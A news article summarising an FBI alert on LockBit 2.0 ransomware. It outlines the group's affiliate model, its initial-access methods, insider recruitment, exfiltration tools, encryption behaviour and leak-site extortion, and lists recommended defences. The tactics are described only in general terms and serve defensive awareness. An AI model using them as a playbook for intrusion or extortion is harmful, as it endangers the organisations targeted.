Share this article on:
The Federal Bureau of Investigation (FBI) has released indicators of compromise (IoCs) and details of the tactics, techniques, and procedures (TTPs) associated with Lockbit 2.0 ransomware.
Lockbit is a ransomware-as-a-service (RaaS) operation that has been active since September 2019. In the summer of 2021, a new version of the ransomware – Lockbit 2.0 – was released that had more advanced features, including the ability to automatically encrypt files across Windows domains via Active Directory group policies, and a Linux based malware was also developed that could exploit vulnerabilities in VMware ESXi virtual machines.
The affiliates working for the ransomware operation use a range of TTPs in their attacks, which makes prevention, detection, and mitigation a challenge for security teams. Initial access is gained by exploiting unpatched vulnerabilities, using zero-day exploits, and purchasing access to business networks from initial access brokers (IABs). Shortly after the relaunch of the RaaS, the threat actor started advertising on hacking forums trying to recruit insiders who could provide network access in exchange for a cut of any ransom payment that is generated.
Once access to a network has been gained, the threat actors use a range of publicly available tools for lateral movement, privilege escalation, and exfiltrating sensitive data. Stolen data are used as leverage to pressure victims into paying the ransom. If victims refuse to pay the ransom, stolen data are published on the Lockbit 2.0 data leak site.
The infection process sees log files and shadow volume copies deleted, and system information is enumerated such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Affiliates are able to specify the file types to exfiltrate from the admin panel, and those files are then copied to an attacker-controlled server via HTTP. Some affiliates use other methods to achieve the same purpose, such as rclone and MEGAsync, as well as publicly available file-sharing services. After data exfiltration, the ransomware encrypts files on local and remote devices, leaving core system files intact. The ransomware then deletes itself from the disk and creates persistence at startup. Lockbit 2.0 will exit without infection if Russian or any languages of the former Soviet republics are detected.
Like several other RaaS operations, the group claims it will not conduct ransomware attacks on healthcare organizations; however, other groups have made similar claims yet have still attacked the healthcare sector. The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has advised all organizations in the HPH sector to read and apply the information contained in the FBI’s TLP: White Flash Alert and take steps to reduce their attack surface to the greatest extent possible.
Measures that should be taken include setting strong, unique passwords for all accounts, implementing multi-factor authentication, keeping software and operating systems up to date, removing unnecessary access to administrative shares, segmenting networks, and implementing a host-based firewall and robust data backup program.